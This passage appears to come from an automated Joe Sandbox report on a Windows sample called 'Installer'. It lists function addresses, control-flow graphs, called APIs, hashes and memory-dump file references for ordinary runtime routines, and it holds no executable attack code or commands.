                                                                                                                                                                    • Opcode ID: 6d9fa8ddb530d3f9190e888be7684e7ec210e5d932ec92e8fbff2f98efae955a
                                                                                                                                                                    • Instruction ID: d1c943e50bab2539c60d661833326965131a099544f0f871f6a38b0c4e3c1d8b
                                                                                                                                                                    • Opcode Fuzzy Hash: 6d9fa8ddb530d3f9190e888be7684e7ec210e5d932ec92e8fbff2f98efae955a
                                                                                                                                                                    • Instruction Fuzzy Hash: E881C236E00325EFCB14DF68E98069EB7F1FFA5350F114629E898A7365D330A865CB81
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00121001 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 390 121001-12103c 392 121056-121062 390->392 393 12103e-121054 390->393 395 1210a0-1210ac __set_app_type 392->395 396 121064-12106b __set_app_type 392->396 393->392 394 1210b0-1210b9 393->394 398 1210f2-1210f6 394->398 399 1210bb-1210c0 394->399 397 121070-121096 __p__fmode __p__commode call 121b60 395->397 396->397 405 1210e0-1210f1 call 1221d0 397->405 406 121098-12109d 397->406 398->392 401 1210fc-121109 398->401 399->392 400 1210c2-1210c9 399->400 400->392 403 1210cb-1210d8 400->403 401->392 403->392
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.304915609.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.304906143.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304937444.0000000000123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304942769.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305120624.0000000000152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000155000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000157000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.000000000015B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305154315.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305160103.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305172976.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000164000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.000000000019F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000202000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000204000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000229000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306047748.000000000022D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306067690.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306080099.0000000000239000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306494076.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306511138.00000000002EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306605590.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306611664.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306631116.0000000000356000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_120000_Installer.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __p__commode__p__fmode__set_app_type
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3338496922-0
                                                                                                                                                                    • Opcode ID: 0ddbea729541c1885dd1427ff7207b771f8b7f19925abe8f987b673977b8d0ee
                                                                                                                                                                    • Instruction ID: 1bf660a885bae848258e5787b8ad28d75ffbc6158de087593d265d52531d502e
                                                                                                                                                                    • Opcode Fuzzy Hash: 0ddbea729541c1885dd1427ff7207b771f8b7f19925abe8f987b673977b8d0ee
                                                                                                                                                                    • Instruction Fuzzy Hash: 8F21E1705003A1FBC325EF20F40676933A1BB24340F958968F0084FA96E77AC8F6DB99
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00122390 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 409 122390-1223af RtlEnterCriticalSection 410 1223b1-1223bd 409->410 411 1223e5-1223fc RtlLeaveCriticalSection 409->411 412 1223c0-1223d0 TlsGetValue GetLastError 410->412 413 1223d2-1223d4 412->413 414 1223de-1223e3 412->414 413->414 415 1223d6-1223d9 413->415 414->411 414->412 415->414
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL ref: 0012239E
                                                                                                                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,001225F5,?,?,?,?,?,00121BA8), ref: 001223C5
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,001225F5,?,?,?,?,?,00121BA8), ref: 001223CC
                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL ref: 001223EC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.304915609.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.304906143.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304937444.0000000000123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304942769.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305120624.0000000000152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000155000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000157000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.000000000015B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305154315.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305160103.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305172976.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000164000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.000000000019F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000202000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000204000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000229000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306047748.000000000022D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306067690.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306080099.0000000000239000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306494076.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306511138.00000000002EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306605590.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306611664.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306631116.0000000000356000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_120000_Installer.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 682475483-0
                                                                                                                                                                    • Opcode ID: 2fd7fbc1d322c1adc4f1bab5aca1885cefe12a508cebabe2d27b32d1012954ae
                                                                                                                                                                    • Instruction ID: eafb34e73f6c1a15b20ead0d6150df4f9c478f87c448801ff087e82b036015c1
                                                                                                                                                                    • Opcode Fuzzy Hash: 2fd7fbc1d322c1adc4f1bab5aca1885cefe12a508cebabe2d27b32d1012954ae
                                                                                                                                                                    • Instruction Fuzzy Hash: 78F0AFB7504310EBCB10BFB8E984A1E7BA4BB49341F050168ED859F214E734A899CBA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00121C60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 416 121c60-121c76 417 121c78 416->417 418 121c7f-121cda call 122a10 fprintf 416->418 417->418
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00121CAF
                                                                                                                                                                    • Unknown error, xrefs: 00121C62
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.304915609.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.304906143.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304937444.0000000000123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304942769.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305120624.0000000000152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000155000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000157000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.000000000015B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305154315.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305160103.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305172976.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000164000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.000000000019F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000202000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000204000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000229000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306047748.000000000022D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306067690.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306080099.0000000000239000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306494076.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306511138.00000000002EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306605590.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306611664.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306631116.0000000000356000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_120000_Installer.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: fprintf
                                                                                                                                                                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                    • API String ID: 383729395-3474627141
                                                                                                                                                                    • Opcode ID: 35206811b9ae092a3098d141f653ad8d8326cc16ee070d84b7ea66cf8ee3bfcb
                                                                                                                                                                    • Instruction ID: 806d0e6bd468d3217d213bef571a2830cac35415fda32d6dcc607702ad711c34
                                                                                                                                                                    • Opcode Fuzzy Hash: 35206811b9ae092a3098d141f653ad8d8326cc16ee070d84b7ea66cf8ee3bfcb
                                                                                                                                                                    • Instruction Fuzzy Hash: 5801D2B0008B55DBC300AF15E58841ABFF1FF89350F92889CE9C847669DB32D8B8CB42
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 0491F7C8 Relevance: .6, Instructions: 616COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 364aede63bfff47a16e934855312538b9d84fa03a46a140cd32132117c7c2f70
                                                                                                                                                                    • Instruction ID: 48e93990d2738791e1d18520c5ac0af09acfe21d87d9c9f8b3f42c4089e34bc7
                                                                                                                                                                    • Opcode Fuzzy Hash: 364aede63bfff47a16e934855312538b9d84fa03a46a140cd32132117c7c2f70
                                                                                                                                                                    • Instruction Fuzzy Hash: 51228B357002199FDB14DF78C464A6E7BA6EF89310F1484ADE80ADB3A6DE34EC46CB51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04918C18 Relevance: 2.0, Instructions: 1973COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: c029f907d0eac2dc571cc2cafe06b00454eae83fb59c6f9c3e9e5c76f993d4f5
                                                                                                                                                                    • Instruction ID: 71a2242bc0a7dc8761d02a539008d11b7126345715dd6044fa5f300c2cc2ac87
                                                                                                                                                                    • Opcode Fuzzy Hash: c029f907d0eac2dc571cc2cafe06b00454eae83fb59c6f9c3e9e5c76f993d4f5
                                                                                                                                                                    • Instruction Fuzzy Hash: 9C13DD38905208EFCF1A9B60E45199DB732FF9A307B50946EDC1237B648A3F9A52DF41
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04918C08 Relevance: 2.0, Instructions: 1973COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 5871f67ded50ccb742022f5c6d660bc574c0c5bac9557ab40b7e240a6629b424
                                                                                                                                                                    • Instruction ID: a2863e0081280b50bacfc8b8d101be5e762bbc8e5b475f705baefe2349a131be
                                                                                                                                                                    • Opcode Fuzzy Hash: 5871f67ded50ccb742022f5c6d660bc574c0c5bac9557ab40b7e240a6629b424
                                                                                                                                                                    • Instruction Fuzzy Hash: AC13DD38905208EFCF1A9B60E45199DB732FF9A307B50946EDC1237B648A3F9A52DF41
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04910908 Relevance: 1.5, Strings: 1, Instructions: 298COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: k7n^
                                                                                                                                                                    • API String ID: 0-3135800245
                                                                                                                                                                    • Opcode ID: 1e3b16e5bf20c8e87911bcff60a3c76a097706ddd194bd334d8c341b3d4058f1
